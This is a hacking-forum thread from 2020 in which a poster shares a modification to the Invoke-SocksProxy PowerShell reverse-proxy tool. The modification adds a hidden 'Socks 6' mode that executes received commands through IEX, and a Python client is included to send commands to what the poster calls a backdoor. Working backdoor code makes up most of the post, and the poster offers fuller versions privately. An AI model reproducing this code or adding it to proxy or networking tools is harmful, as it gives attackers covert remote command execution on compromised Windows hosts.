[Revese socks] Github project Improvement for RCE
by guilimix - October 19, 2020 at 09:35 AM
#1
Tongue 
Very useful tool for reverse socks in powershell: https://github.com/p3nt4/Invoke-SocksProxy

Doesn't have command exec, here is my hack to add this feature:

modify Invoke-SocksProxy.psm1 to add a "Socks 6" version handeling

if ($socksVer -eq 6){
        $lencmd=[int]$buffer[1];
        $data = New-Object System.Byte[] $lencmd;
        $cliStream.Read($data,0,$lencmd) | Out-Null;
        $res=IEX([system.Text.Encoding]::UTF8.GetString($data));
        $cliStream.Write([system.Text.Encoding]::UTF8.GetBytes($res+"--MAGIC-TOKEN--"));
}


and here is the python file to talk to this new backdoor:

import socket, sys
HOST = sys.argv[1] # usually 127.0.0.1
PORT = int(sys.argv[2])
COMMAND=sys.argv[3]

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    s.send(b'\x06'+bytes([len(COMMAND)])+COMMAND.encode("utf-8"))
    data = b""
    while data.decode("utf-8").count("--MAGIC-TOKEN--")<1:
        data += s.recv(2014)
    print(data.replace(b"--MAGIC-TOKEN--",b"").decode("utf-8"))



MP to have the full code, version c# also available.
Reply
#2
Great! Thanks mate for this share!
Reply
#3
nice one, thanks for sharing
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
Hiding Syscall project and tutorial Passthehacker 1 223 June 10, 2021 at 02:32 PM
Last Post: colum28
cobalt wipe (strike) Github HELLOQQ 2 286 May 31, 2021 at 09:43 AM
Last Post: Theoretically
Python3, Collection Finder, CLI utility - Personal project - PR are welcome ! LeDocteur 5 876 May 03, 2021 at 07:43 PM
Last Post: LeDocteur

 Users browsing this thread: 1 Guest(s)